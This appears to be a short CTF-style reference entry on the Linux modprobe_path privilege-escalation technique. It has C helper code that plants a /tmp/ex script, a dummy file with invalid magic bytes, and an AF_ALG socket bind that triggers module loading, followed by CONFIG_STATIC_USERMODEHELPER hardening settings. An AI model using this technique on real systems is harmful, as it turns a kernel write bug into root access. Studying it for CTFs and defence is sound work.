modprobe_path

#targets
Requireskernel-arbitrary-write
Givesroot-privileges
HardeningCONFIG_STATIC_USERMODEHELPER

modprobe_path is a kernel global variable that holds the path to the modprobe binary (usually /sbin/modprobe). When the kernel needs to load a module (e.g., when a device is plugged in or a packet with an unknown protocol is received), it executes the file at this path.


Plug and Play


void modprobe_exploit_setup() {
	//overwrite modprobe_path string with "/tmp/ex"
	//change the script content as needed
    FILE *fp = fopen("/tmp/ex", "w");
    if (fp) {
        fprintf(fp, "#!/bin/sh\n");
        fprintf(fp, "chmod 777 /flag\n"); 
        fclose(fp);
    }
    system("chmod +x /tmp/ex");

    // 2. Create the dummy file with invalid magic bytes (0xdeadbeef)
    system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
    system("chmod +x /tmp/pwn");
    
    printf("[+] Modprobe exploit setup complete.\n");
}

More Reliable

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <fcntl.h>
#include <sys/mman.h>
int main(void)
{
        struct sockaddr_alg sa;
        int fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
        if (fd < 0) {
                perror("Failed");
                return 1;
        }

        memset(&sa, 0, sizeof(sa));
        sa.salg_family = AF_ALG;
        strcpy((char *)sa.salg_type, "V4bel");  
        bind(fd, (struct sockaddr *)&sa, sizeof(sa));

        return 0;
}

Hardening

CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH="/sbin/modprobe"
  • With these configs, Linux uses a fixed path. (Cannot overwrite it)